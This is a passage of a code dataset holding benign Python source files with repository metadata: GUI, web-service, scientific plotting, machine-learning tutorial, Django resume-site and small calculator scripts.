self.searchBtn.Enable(True)\r\n self.Bind(wx.EVT_BUTTON, self.onSearchName, self.searchBtn)\r\n\r\n sizer.AddGrowableRow(1)\r\n self.vBox.Add(sizer, wx.ALIGN_BOTTOM, 10)\r\n\r\n def updateGrid(self, rows):\r\n self.grid.ClearGrid()\r\n self.data.InsertRows(rows)\r\n self.grid.SetTable(self.data)\r\n self.grid.AutoSize()\r\n self.vBox.Layout()\r\n\r\n def OnEnter(self, evt):\r\n if TimeUtil.isValidDate(self.dateInput.GetValue()):\r\n self.warnMsg.Hide()\r\n self.calculateButton.Enable(True)\r\n else:\r\n self.warnMsg.Show()\r\n # re-layout\r\n self.vBox.Layout()\r\n self.calculateButton.Enable(False)\r\n\r\n def onSearchName(self, evt):\r\n dailyData = DailyDataDAL.fetchByNameDate(self.dateInput.GetValue(), self.searchInput.GetValue())\r\n self.updateGrid(dailyData.toStringList())\r\n\r\n def onSearchDate(self, evt):\r\n dailyData = DailyDataDAL.fetchAllByDate(self.dateInput.GetValue())\r\n self.updateGrid(dailyData.toStringList())\r\n","repo_name":"AaronGeist/GameStatistics","sub_path":"src/UI/BuyerPanel.py","file_name":"BuyerPanel.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7911429807","text":"import random\n\nfrom fastapi import Depends\n\nfrom retosquadmakers.services.joke.enums import JokeProviderEnum\nfrom retosquadmakers.services.joke.repositories import Repository\n\n\nclass JokeService:\n\n def __init__(self, repository: Repository = Depends()):\n self.repositories = repository\n\n async def get_joke(self, provider: JokeProviderEnum | None):\n if provider == JokeProviderEnum.Chuck:\n return await self.repositories.chuck_norris_repository.get_random_joke()\n if provider == JokeProviderEnum.Dad:\n return await self.repositories.can_haz_dad_joke_repository.get_random_joke()\n if provider == JokeProviderEnum.Random or provider is None:\n providers = [self.repositories.chuck_norris_repository, self.repositories.can_haz_dad_joke_repository]\n provider = providers[random.randint(0, len(providers) - 1)]\n return await provider.get_random_joke()\n","repo_name":"Ventura94/RetoSquadMakers","sub_path":"retosquadmakers/services/joke/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"23653226412","text":"import logging\nimport matplotlib\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nlogger = logging.getLogger(__name__)\n\n\ndef plot_fisher_information_contours_2d(\n fisher_information_matrices,\n fisher_information_covariances=None,\n reference_thetas=None,\n contour_distance=1.0,\n xlabel=r\"$\\theta_0$\",\n ylabel=r\"$\\theta_1$\",\n xrange=(-1.0, 1.0),\n yrange=(-1.0, 1.0),\n labels=None,\n inline_labels=None,\n resolution=500,\n colors=None,\n linestyles=None,\n linewidths=1.5,\n alphas=1.0,\n alphas_uncertainties=0.25,\n sigma_uncertainties=1,\n ax=None,\n):\n \"\"\"\n Visualizes 2x2 Fisher information matrices as contours of constant Fisher distance from a reference point `theta0`.\n\n The local (tangent-space) approximation is used: distances `d(theta)` are given by\n `d(theta)^2 = (theta - theta0)_i I_ij (theta - theta0)_j`, summing over `i` and `j`.\n\n Parameters\n ----------\n fisher_information_matrices : list of ndarray\n Fisher information matrices, each with shape (2,2).\n\n fisher_information_covariances : None or list of (ndarray or None), optional\n Covariance matrices for the Fisher information matrices. Has to have the same length as\n fisher_information_matrices, and each entry has to be None (no uncertainty) or a tensor with shape\n (2,2,2,2). Default value: None.\n\n reference_thetas : None or list of (ndarray or None), optional\n Reference points from which the distances are calculated. If None, the origin (0,0) is used. Default value:\n None.\n\n contour_distance : float, optional.\n Distance threshold at which the contours are drawn. Default value: 1.\n\n xlabel : str, optional\n Label for the x axis. Default value: r'$\\theta_0$'.\n\n ylabel : str, optional\n Label for the y axis. Default value: r'$\\theta_1$'.\n\n xrange : tuple of float, optional\n Range `(min, max)` for the x axis. Default value: (-1., 1.).\n\n yrange : tuple of float, optional\n Range `(min, max)` for the y axis. Default value: (-1., 1.).\n\n labels : None or list of (str or None), optional\n Legend labels for the contours. Default value: None.\n\n inline_labels : None or list of (str or None), optional\n Inline labels for the contours. Default value: None.\n\n resolution : int\n Number of points per axis for the calculation of the distances. Default value: 500.\n\n colors : None or str or list of str, optional\n Matplotlib line (and error band) colors for the contours. If None, uses default colors. Default value: None.\n\n linestyles : None or str or list of str, optional\n Matploitlib line styles for the contours. If None, uses default linestyles. Default value: None.\n\n linewidths : float or list of float, optional\n Line widths for the contours. Default value: 1.5.\n\n alphas : float or list of float, optional\n Opacities for the contours. Default value: 1.\n\n alphas_uncertainties : float or list of float, optional\n Opacities for the error bands. Default value: 0.25.\n\n sigma_uncertainties : float, optional\n Number of gaussian sigmas used when presenting uncertainty bands. Default value: 1.\n\n ax: axes or None, optional\n Predefined axes as part of figure instead of standalone figure. Default: None\n\n Returns\n -------\n figure : Figure\n Plot as Matplotlib Figure instance.\n\n \"\"\"\n # Input data\n fisher_information_matrices = np.asarray(fisher_information_matrices)\n\n n_matrices = fisher_information_matrices.shape[0]\n\n if fisher_information_matrices.shape != (n_matrices, 2, 2):\n raise RuntimeError(f\"Fisher information matrices have shape {fisher_information_matrices.shape}. Not (n, 2,2)!\")\n\n if fisher_information_covariances is None:\n fisher_information_covariances = [None for _ in range(n_matrices)]\n\n if reference_thetas is None:\n reference_thetas = [None for _ in range(n_matrices)]\n\n d2_threshold = contour_distance**2.0\n\n # Line formatting\n if colors is None:\n colors = [\"C\" + str(i) for i in range(10)] * (n_matrices // 10 + 1)\n elif not isinstance(colors, list):\n colors = [colors for _ in range(n_matrices)]\n\n if linestyles is None:\n linestyles = [\"solid\", \"dashed\", \"dotted\", \"dashdot\"] * (n_matrices // 4 + 1)\n elif not isinstance(linestyles, list):\n linestyles = [linestyles for _ in range(n_matrices)]\n\n if not isinstance(linewidths, list):\n linewidths = [linewidths for _ in range(n_matrices)]\n\n if not isinstance(alphas, list):\n alphas = [alphas for _ in range(n_matrices)]\n\n if not isinstance(alphas_uncertainties, list):\n alphas_uncertainties = [alphas_uncertainties for _ in range(n_matrices)]\n\n # Grid\n xi = np.linspace(xrange[0], xrange[1], resolution)\n yi = np.linspace(yrange[0], yrange[1], resolution)\n xx, yy = np.meshgrid(xi, yi, indexing=\"xy\")\n xx, yy = xx.flatten(), yy.flatten()\n thetas = np.vstack((xx, yy)).T\n\n # Theta from reference thetas\n d_thetas = []\n for reference_theta in reference_thetas:\n if reference_theta is None:\n d_thetas.append(thetas)\n else:\n d_thetas.append(thetas - reference_theta)\n d_thetas = np.array(d_thetas) # Shape (n_matrices, n_thetas, n_parameters)\n\n # Calculate Fisher distances\n fisher_distances_squared = np.einsum(\"mni,mij,mnj->mn\", d_thetas, fisher_information_matrices, d_thetas)\n fisher_distances_squared = fisher_distances_squared.reshape((n_matrices, resolution, resolution))\n\n # Calculate uncertainties of Fisher distances\n fisher_distances_squared_uncertainties = []\n for d_theta, inf_cov in zip(d_thetas, fisher_information_covariances):\n if inf_cov is None:\n fisher_distances_squared_uncertainties.append(None)\n continue\n\n var = np.einsum(\"ni,nj,ijkl,nk,nl->n\", d_theta, d_theta, inf_cov, d_theta, d_theta)\n\n uncertainties = (var**0.5).reshape((resolution, resolution))\n fisher_distances_squared_uncertainties.append(uncertainties)\n\n logger.debug(\"Std: %s\", uncertainties)\n\n # Plot results\n do_fig = False\n if ax is None:\n do_fig = True\n fig = plt.figure(figsize=(5.0, 5.0))\n ax = plt.gca()\n\n # Error bands\n for i in range(n_matrices):\n if fisher_information_covariances[i] is not None:\n d2_up = fisher_distances_squared[i] + sigma_uncertainties * fisher_distances_squared_uncertainties[i]\n d2_down = fisher_distances_squared[i] - sigma_uncertainties * fisher_distances_squared_uncertainties[i]\n band = (d2_up > d2_threshold) * (d2_down < d2_threshold) + (d2_up < d2_threshold) * (d2_down > d2_threshold)\n\n plt.contourf(xi, yi, band, [0.5, 2.5], colors=colors[i], alpha=alphas_uncertainties[i])\n\n # Predictions\n for i in range(n_matrices):\n cs = ax.contour(\n xi,\n yi,\n fisher_distances_squared[i],\n np.array([d2_threshold]),\n colors=colors[i],\n linestyles=linestyles[i],\n linewidths=linewidths[i],\n alpha=alphas[i],\n label=None if labels is None else labels[i],\n )\n\n if inline_labels is not None and inline_labels[i] is not None and len(inline_labels[i]) > 0:\n ax.clabel(cs, cs.levels, inline=True, fontsize=12, fmt={d2_threshold: inline_labels[i]})\n\n # Legend and decorations\n if labels is not None:\n ax.legend()\n\n if do_fig:\n plt.axes().set_xlim(xrange)\n plt.axes().set_ylim(yrange)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.tight_layout()\n return fig\n else:\n return ax\n\n\ndef plot_fisherinfo_barplot(\n fisher_information_matrices,\n labels,\n determinant_indices=None,\n eigenvalue_colors=None,\n bar_colors=None,\n):\n \"\"\"\n\n Parameters\n ----------\n fisher_information_matrices : list of ndarray\n Fisher information matrices\n\n labels : list of str\n Labels for the x axis\n\n determinant_indices : list of int or None, optional\n If not None, the determinants will be based only on the indices given here. Default value: None.\n\n eigenvalue_colors : None or list of str\n Colors for the eigenvalue decomposition. If None, default colors are used. Default value: None.\n\n bar_colors : None or list of str\n Colors for the determinant bars. If None, default colors are used. Default value: None.\n\n Returns\n -------\n figure : Figure\n Plot as Matplotlib Figure instance.\n\n \"\"\"\n\n # Prepare data\n if determinant_indices is None:\n matrices_for_determinants = fisher_information_matrices\n else:\n matrices_for_determinants = [m[determinant_indices, determinant_indices] for m in fisher_information_matrices]\n\n size_upper = len(fisher_information_matrices[1])\n size_lower = len(matrices_for_determinants[1])\n exponent_lower = 1.0 / float(size_lower)\n\n determinants = [np.linalg.det(m) ** exponent_lower for m in matrices_for_determinants]\n\n assert len(determinants) == len(labels)\n n_entries = len(determinants)\n\n # Calculate eigenvalues + eigenvalue composition\n eigenvalues = []\n eigenvalues_dominant_components = []\n eigenvalues_composition = []\n\n for m in fisher_information_matrices:\n v, w = np.linalg.eig(m)\n w = np.transpose(w)\n v, w = zip(*sorted(zip(v, w), key=lambda x: x[0], reverse=True))\n temp = []\n temp_dominant_components = []\n temp_composition = []\n for vi, wi in zip(v, w):\n temp.append(vi)\n temp_dominant_components.append(np.argmax(np.absolute(wi)))\n temp_composition.append(wi * wi / (sum(wi * wi)))\n\n eigenvalues.append(temp)\n eigenvalues_dominant_components.append(temp_dominant_components)\n eigenvalues_composition.append(temp_composition)\n\n # x positioning\n base_xvalues = np.linspace(0.0, float(n_entries) - 1.0, n_entries)\n base_xmin = base_xvalues[0]\n base_xmax = base_xvalues[n_entries - 1] + 1.0\n xmin_eigenvalues = base_xvalues + 0.08\n xmax_eigenvalues = base_xvalues + 0.92\n xpos_ticks = base_xvalues + 0.5\n xpos_lower = base_xvalues + 0.5\n width_lower = 0.8\n\n # Colors\n if bar_colors is None:\n bar_colors = [\"0.5\" for _ in range(n_entries)]\n bar_colors_light = [\"0.9\" for _ in range(n_entries)]\n else:\n bar_colors_light = bar_colors\n\n if eigenvalue_colors is None:\n eigenvalue_colors = [f\"C{i}\" for i in range(10)]\n eigenvalue_linewidth = 1.5\n\n # Upper plot\n fig = plt.figure(figsize=(10.0, 7.0))\n ax1 = plt.subplot(211)\n\n # Plot eigenvalues\n for i in range(n_entries):\n for eigenvalue, composition in zip(eigenvalues[i], eigenvalues_composition[i]):\n # Gap sizing\n n_gaps = -1\n minimal_fraction_for_plot = 0.01\n for fraction in composition:\n if fraction >= minimal_fraction_for_plot:\n n_gaps += 1\n gap_fraction = 0.04\n gap_correction_factor = 1.0 - n_gaps * gap_fraction\n\n fraction_finished = 0.0\n\n for component, fraction in enumerate(composition):\n if fraction >= minimal_fraction_for_plot:\n plt.hlines(\n [eigenvalue],\n xmin_eigenvalues[i] + fraction_finished * (xmax_eigenvalues[i] - xmin_eigenvalues[i]),\n xmin_eigenvalues[i]\n + (fraction_finished + gap_correction_factor * fraction)\n * (xmax_eigenvalues[i] - xmin_eigenvalues[i]),\n eigenvalue_colors[component],\n linestyles=\"solid\",\n linewidth=eigenvalue_linewidth,\n )\n fraction_finished += gap_correction_factor * fraction + gap_fraction\n\n ax1.set_yscale(\"log\")\n ax1.set_xlim([base_xmin - 0.2, base_xmax + 0.2])\n y_max = max([max(ev) for ev in eigenvalues])\n ax1.set_ylim(0.0001 * y_max, 2.0 * y_max)\n\n ax1.set_xticks(xpos_ticks)\n ax1.set_xticklabels([\"\" for _ in labels], rotation=40, ha=\"right\")\n ax1.set_ylabel(r\"$I_{ij}$ eigenvalues\")\n\n # Lower plot\n ax3 = plt.subplot(212)\n\n bar_plot = ax3.bar(xpos_lower, determinants, width=width_lower, log=False)\n\n for i in range(n_entries):\n bar_plot[i].set_color(bar_colors_light[i])\n bar_plot[i].set_edgecolor(bar_colors[i])\n\n ax3.set_xlim([base_xmin - 0.2, base_xmax + 0.2])\n ax3.set_ylim([0.0, max(determinants) * 1.05])\n\n ax3.set_xticks(xpos_ticks)\n ax3.set_xticklabels(labels, rotation=40, ha=\"right\")\n ax3.set_ylabel(r\"$(\\det \\ I_{ij})^{1/\" + str(size_lower) + r\"}$\")\n\n plt.tight_layout()\n return fig\n\n\ndef plot_distribution_of_information(\n xbins,\n xsecs,\n fisher_information_matrices,\n fisher_information_matrices_aux=None,\n xlabel=None,\n xmin=None,\n xmax=None,\n log_xsec=False,\n norm_xsec=True,\n epsilon=1.0e-9,\n figsize=(5.4, 4.5),\n fontsize=None,\n):\n \"\"\"\n Plots the distribution of the cross section together with the distribution of the Fisher information.\n\n Parameters\n ----------\n xbins : list of float\n Bin boundaries.\n\n xsecs : list of float\n Cross sections (in pb) per bin.\n\n fisher_information_matrices : list of ndarray\n Fisher information matrices for each bin.\n\n fisher_information_matrices_aux : list of ndarray or None, optional\n Additional Fisher information matrices for each bin (will be plotted with a dashed line).\n\n xlabel : str or None, optional\n Label for the x axis.\n\n xmin : float or None, optional\n Minimum value for the x axis.\n\n xmax : float or None, optional\n Maximum value for the x axis.\n\n log_xsec : bool, optional\n Whether to plot the cross section on a logarithmic y axis.\n\n norm_xsec : bool, optional\n Whether the cross sections are normalized to 1.\n\n epsilon : float, optional\n Numerical factor.\n\n figsize : tuple of float, optional\n Figure size, default: (5.4, 4.5)\n\n fontsize: float, optional\n Fontsize, default None\n\n Returns\n -------\n figure : Figure\n Plot as Matplotlib Figure instance.\n\n \"\"\"\n # prepare Plot\n if fontsize is not None:\n matplotlib.rcParams.update({\"font.size\": fontsize})\n\n # Prepare data\n n_entries = len(fisher_information_matrices)\n size = len(fisher_information_matrices[1])\n exponent = 1.0 / float(size)\n\n determinants = [np.nan_to_num(np.linalg.det(m) ** exponent) for m in fisher_information_matrices]\n\n if fisher_information_matrices_aux is not None:\n determinants_aux = [np.nan_to_num(np.linalg.det(m) ** exponent) for m in fisher_information_matrices_aux]\n\n if xlabel is None:\n xlabel = \"\"\n\n # Normalize xsecs\n if norm_xsec:\n norm = 1.0 / max(sum([xs for xs in xsecs]), epsilon)\n else:\n norm = 1.0\n xsec_norm = [norm * xs for xs in xsecs]\n\n # Get xvals from xbins\n xvals = [(xbins[i] + xbins[i + 1]) / 2 for i in range(0, len(xbins) - 1)]\n xvals = [xbins[0] - epsilon] + xvals + [xbins[len(xbins) - 1] + epsilon]\n assert len(xvals) == n_entries\n\n # Plotting options\n xs_color = \"black\"\n xs_linestyle = \"-\"\n xs_linewidth = 1.5\n\n det_color = \"red\"\n det_linestyle = \"-\"\n det_linewidth = 1.5\n det_fill_alpha = 0.1\n\n det_aux_color = \"red\"\n det_aux_linestyle = \"--\"\n det_aux_linewidth = 1.5\n\n # xsec plot\n fig = plt.figure(figsize=figsize)\n ax1 = plt.subplot(111)\n # fig.subplots_adjust(left=0.1667, right=0.8333, bottom=0.17, top=0.97)\n\n if log_xsec:\n ax1.set_yscale(\"log\")\n\n ax1.hist(\n xvals,\n weights=xsec_norm,\n bins=xbins,\n range=(xmin, xmax),\n histtype=\"step\",\n color=xs_color,\n linewidth=xs_linewidth,\n linestyle=xs_linestyle,\n )\n\n if norm_xsec:\n ax1.set_ylabel(r\"Normalized distribution\", color=xs_color)\n else:\n ax1.set_ylabel(r\"$\\sigma$ [pb/bin]\")\n ax1.set_xlim([xmin, xmax])\n ax1.set_ylim([0.0, max(xsec_norm) * 1.05])\n ax1.set_xlabel(xlabel)\n for tl in ax1.get_yticklabels():\n tl.set_color(xs_color)\n\n # det plot\n ax2 = ax1.twinx()\n\n if fisher_information_matrices_aux is not None:\n ax2.hist(\n xvals,\n weights=determinants_aux,\n bins=xbins,\n range=(xmin, xmax),\n histtype=\"step\",\n color=det_aux_color,\n linewidth=det_aux_linewidth,\n linestyle=det_aux_linestyle,\n )\n\n ax2.hist(\n xvals,\n weights=determinants,\n bins=xbins,\n range=(xmin, xmax),\n histtype=\"stepfilled\",\n alpha=det_fill_alpha,\n color=det_color,\n linewidth=0.0,\n )\n\n ax2.hist(\n xvals,\n weights=determinants,\n bins=xbins,\n range=(xmin, xmax),\n histtype=\"step\",\n color=det_color,\n linewidth=det_linewidth,\n linestyle=det_linestyle,\n )\n\n ax2.set_xlim([xmin, xmax])\n ax2.set_ylim([0.0, max(determinants) * 1.1])\n ax2.set_ylabel(r\"$(\\det \\; I_{ij})^{1/\" + str(size) + \"}$\", color=det_color)\n for tl in ax2.get_yticklabels():\n tl.set_color(det_color)\n\n return fig\n","repo_name":"madminer-tool/madminer","sub_path":"madminer/plotting/fisherinformation.py","file_name":"fisherinformation.py","file_ext":"py","file_size_in_byte":17483,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"99"} +{"seq_id":"17967984116","text":"import streamlit as slt\r\nslt.header(\"Application de prédiction de fev/fvc\")\r\nslt.subheader(\"Cette application permet de prédire le fev/fvc, dans un intervalle de confiance de 90% en fonction de l'age et de la taille\")\r\nslt.markdown(\"***Application developpée par Dr Fanny dans le cadre de sa formation en data science***\")\r\n\r\nimport pandas as pd\r\n\r\nimport numpy as np\r\n\r\ndf= pd.read_csv('https://raw.githubusercontent.com/pefura/IFPERA/main/Cameroon_lung_function.csv', sep= ';')\r\ndf = df.copy()\r\n\r\ndataset= df.loc[df['sex']== 2, ['age', 'height', 'fev', 'fvc']]\r\ndataset['fev/fvc']=dataset.fev/dataset.fvc\r\ndataset_c= dataset.drop([1127, 1561, 1628, 1741], axis=0)\r\ndata= dataset_c.drop(columns =['fev', 'fvc'])\r\n\r\n\r\ny = data['fev/fvc']\r\nX = data.drop(columns =['fev/fvc'])\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.2,\r\n random_state=0 )\r\n\r\n#Gradient boosting model\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nGB_model_final= GradientBoostingRegressor(max_depth=2, n_estimators=225, random_state=0)\r\n\r\n## Fonction de calcul\r\nage = slt.number_input (label= 'Age en années')\r\nheight = slt.number_input (label= 'Taille en cm')\r\ndef prediction_fevfvc (age, height):\r\n fit_mean = GradientBoostingRegressor(loss=\"squared_error\", random_state=0, max_depth=2, n_estimators=225,)\r\n fit_mean.fit(X_train, y_train)\r\n fit_LLN= GradientBoostingRegressor(loss=\"quantile\", alpha=0.05, random_state=0, max_depth=2, n_estimators=225,)\r\n fit_LLN.fit(X_train, y_train)\r\n fit_ULN= GradientBoostingRegressor(loss=\"quantile\", alpha=0.95, random_state=0, max_depth=2, n_estimators=225,)\r\n fit_ULN.fit(X_train, y_train)\r\n var = {'age':[age],\r\n 'height':[height]}\r\n X1 = pd.DataFrame (var)\r\n pred_mean = fit_mean.predict(X1)\r\n LLN = fit_LLN.predict(X1)\r\n ULN = fit_ULN.predict(X1)\r\n table = pd.DataFrame([LLN [0],pred_mean[0], ULN[0]]).T\r\n table.columns = [\"LLN\", \"mean\", \"ULN\"]\r\n return table\r\n\r\nslt.markdown(\"Valeur moyenne prédite de fev/fvc\")\r\n\r\nfevfvc= slt.write(prediction_fevfvc (age, height))\r\n\r\nslt.text (\"LLN: limite inférieure de l'IC à 90%\")\r\n\r\nslt.text (\"ULN: limite supérieure de l'IC à 90%\")\r\n\r\n\r\n\r\n\r\n","repo_name":"FannyMayoh/devoir_IFPERA","sub_path":"test_ap_ifpera.py","file_name":"test_ap_ifpera.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37640470571","text":"from multiprocessing import Queue\n\nfrom .common.blob import load_and_classify\nfrom .common.logging import log_debug as _log_debug\nfrom .common.logging import log_info as _log_info\nfrom .common.logging import log_warning as _log_warning\nfrom .common.logging import log_error as _log_error\nfrom .driver import do_generate\nfrom designformat import *\nimport designformat\n\ndef log_debug(message): _log_debug(f\"[WORKER] {message}\")\ndef log_info(message): _log_info(f\"[WORKER] {message}\")\ndef log_warning(message): _log_warning(f\"[WORKER] {message}\")\ndef log_error(message): _log_error(f\"[WORKER] {message}\")\n\ndef worker(\n path : str,\n tasks : list,\n tmpl_dirs : list,\n templates : dict,\n target : str,\n defines : dict,\n other_paths: list,\n return_q : Queue\n):\n \"\"\"\n Templating worker process that can be launched via multiprocessing.\n\n Args:\n path : Path to the DesignFormat blob to load.\n task : List of GenTasks for this worker to perform.\n tmpl_dirs : All of the directories to add to the template lookup\n templates : Map of all templates that are registered\n target : Path to the output directory\n defines : Extra values defined on the command line\n other_paths: Additional paths to files required by templates\n return_q : Cross-process queue for returning failures\n \"\"\"\n\n # Load the worker's copy of the blob file\n log_debug(\"Loading blob from: \" + path)\n df_root, classified = load_and_classify(path)\n\n # Work through the rendering tasks\n log_debug(f\"Starting to render {len(tasks)} tasks\")\n for task in tasks:\n # First find all of the referenced nodes\n log_debug(f\"Identifying {len(task.nodes)} nodes from the GenTask\")\n nodes = task.lookup_nodes(classified)\n # Kick off the generation task\n log_debug(f\"Kicking off the generation task\")\n do_generate(\n task, nodes, df_root, tmpl_dirs, templates, target, defines,\n other_paths\n )\n # Queue the task back to the master (returns errors etc)\n return_q.put(task)\n log_debug(f\"All tasks completed\")\n\n","repo_name":"bluwireless/blade-templating","sub_path":"blade_templating/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"12764999565","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# 한글출력\r\nplt.rcParams['font.family'] = 'NanumBarunGothic'\r\nplt.rcParams['axes.unicode_minus'] = False\r\n\r\n# 51% 동전 확률 그래프 그리기\r\nheads_proba = 0.51\r\ncoin_tosses = (np.random.rand(10000, 10) < heads_proba).astype(np.int32)\r\ncumulative_heads_ratio = np.cumsum(coin_tosses, axis=0) / np.arange(1, 10001).reshape(-1, 1)\r\n\r\nplt.figure(figsize=(8,3.5))\r\nplt.plot(cumulative_heads_ratio)\r\nplt.plot([0, 10000], [0.51, 0.51], \"k--\", linewidth=2, label=\"51%\")\r\nplt.plot([0, 10000], [0.5, 0.5], \"k-\", label=\"50%\")\r\nplt.xlabel(\"동전을 던진 횟수\")\r\nplt.ylabel(\"앞면이 나온 비율\")\r\nplt.legend(loc=\"lower right\")\r\nplt.axis([0, 10000, 0.42, 0.58])\r\nplt.show()\r\n\r\n#moons 데이터셋 불러오기\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.datasets import make_moons\r\n\r\nX, y = make_moons(n_samples=500, noise=0.30, random_state=42)\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)\r\n\r\ndef plot_dataset(X, y, axes):\r\n plt.plot(X[:, 0][y==0], X[:, 1][y==0], \"bs\")\r\n plt.plot(X[:, 0][y==1], X[:, 1][y==1], \"g^\")\r\n plt.axis(axes)\r\n plt.grid(True, which='both')\r\n plt.xlabel(r\"$x_1$\", fontsize=20)\r\n plt.ylabel(r\"$x_2$\", fontsize=20, rotation=0)\r\n\r\nplot_dataset(X, y, [-2, 3, -1.5, 2])\r\nplt.show()\r\n\r\n#투표기반 분류기\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.ensemble import VotingClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.svm import SVC\r\n\r\nlog_clf = LogisticRegression(solver='liblinear', random_state=42)\r\nrnd_clf = RandomForestClassifier(n_estimators=10, random_state=42)\r\nsvm_clf = SVC(gamma='auto', probability=True, random_state=42)\r\n\r\n# hard, soft 선택 필요\r\nvoting_clf = VotingClassifier(\r\n estimators=[('lr', log_clf), ('rf', rnd_clf), ('svc', svm_clf)],\r\n voting='hard')\r\nvoting_clf.fit(X_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfor clf in (log_clf, rnd_clf, svm_clf, voting_clf):\r\n clf.fit(X_train, y_train)\r\n y_pred = clf.predict(X_test)\r\n print(clf.__class__.__name__, accuracy_score(y_test, y_pred))\r\n\r\n# 배깅 실습\r\n\r\nfrom sklearn.ensemble import BaggingClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nbag_clf = BaggingClassifier(\r\n DecisionTreeClassifier(random_state=42), n_estimators=40,\r\n max_samples=100, bootstrap=True, n_jobs=-1, random_state=42)\r\nbag_clf.fit(X_train, y_train)\r\ny_pred = bag_clf.predict(X_test)\r\n\r\n# 배깅 정확도\r\nfrom sklearn.metrics import accuracy_score\r\nprint(accuracy_score(y_test, y_pred))\r\n\r\n# 단일 결정트리 정확도\r\ntree_clf = DecisionTreeClassifier(random_state=42)\r\ntree_clf.fit(X_train, y_train)\r\ny_pred_tree = tree_clf.predict(X_test)\r\nprint(accuracy_score(y_test, y_pred_tree))\r\n\r\n\r\n\r\n#랜덤포레스트\r\n\r\nbag_clf = BaggingClassifier(\r\n DecisionTreeClassifier(splitter=\"random\", max_leaf_nodes=16, random_state=42),\r\n n_estimators=500, max_samples=1.0, bootstrap=True, n_jobs=-1, random_state=42)\r\nbag_clf.fit(X_train, y_train)\r\ny_pred = bag_clf.predict(X_test)\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nrnd_clf = RandomForestClassifier(n_estimators=500, max_leaf_nodes=16, n_jobs=-1, random_state=42)\r\nrnd_clf.fit(X_train, y_train)\r\n\r\ny_pred_rf = rnd_clf.predict(X_test)\r\n\r\nprint(np.sum(y_pred == y_pred_rf) / len(y_pred)) # 거의 동일한 예측","repo_name":"bc8c/C211_ML","sub_path":"MLSample/SL_Ensemble.py","file_name":"SL_Ensemble.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74481670404","text":"from django.shortcuts import render\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.db.models import Count\nfrom .forms import ProfileForm, ContactForm\nfrom .models import Profile, MainAbilities, Education, Experience, Certificates, Skill, RecentWork\n\n\n\n#--------------------------------------MAIN CV PAGE -------------------------------------------------\ndef home(request):\n about = Profile.objects.filter(status='active')\n abilities = list(MainAbilities.objects.all())\n education = Education.objects.all()\n experience = Experience.objects.all()\n skills = Skill.objects.filter(active='True')\n # portfolio_count = RecentWork.objects.annotate(num_categories=Count('category'))\n if request.method == \"POST\":\n message_name = request.POST['name']\n message_email = request.POST['email']\n message = request.POST['message']\n\n send_mail(\n message_name, # name of sender\n message, # text\n message_email, # email\n ['contact@ninjaweb.tech'], # to email\n fail_silently=False,\n )\n\n context = {\n # 'form': form,\n # 'technical_skills': technical_skills,\n # 'professional_skills': professional_skills,\n # 'language_skills': language_skills,\n # 'hobby_skills': hobby_skills,\n 'skills': skills,\n 'experience': experience,\n 'education': education,\n 'abilities': abilities,\n 'about': about,\n 'message_name': message_name,\n 'message_email': message_email,\n 'message': message,\n }\n return render(request, 'resume1/index.html', context)\n\n\n else:\n # return the page\n context = {\n 'skills': skills,\n 'experience': experience,\n 'education': education,\n 'abilities': abilities,\n 'about': about,\n\n }\n return render(request, 'resume1/index.html', context)\n#======================== page not found page================================\ndef page_not_found(request, exception):\n template = 'services/404.html'\n return render(request, template, {})\n#======================== page not found page================================\ndef server_error(request):\n template = 'services/500.html'\n return render(request, template, {})\n","repo_name":"ungureanudaniel/resume1","sub_path":"resumeapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7823359206","text":"#CGPA Calculator\nCA_Total=100\nCA_Wtg=25\nMTE_Total=40\nMTE_Wtg=20\nETE_Total=70\nETE_Wtg=50\nC_code=input(\"Enter course code \")\nCA_obt=int(input(\"CA mark obtain \"))\nMTE_obt=int(input(\"MTE mark obtain \"))\nETE_obt=int(input(\"ETE mark obtain \"))\nAt=int(input(\"Enter Attendance mark \"))\nCA_mark=(CA_obt*CA_Wtg)/CA_Total\nMTE_mark=(MTE_obt*MTE_Wtg)/MTE_Total\nETE_mark=(ETE_obt*ETE_Wtg)/ETE_Total\ntotal=CA_mark+MTE_mark+ETE_mark+At\nprint(\"Mark Obtain for \",C_code,\" \",total, end=\" \")\nprint(\"Final CGPA =\",total/10)","repo_name":"mdsakilansari/PythonBasic","sub_path":"CGPA_Calculator.py","file_name":"CGPA_Calculator.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41460316302","text":"'''\r\nes un formato que nos permite hacer transferencia de datos/ intercambio de informacion entre distintas apps y esta inspirado en la manera que javascript se definen los objetos de manera literal\r\n'''\r\n\r\nimport json #para poder trabajaron con json\r\n'''json.dumps #convertir informacion en formato 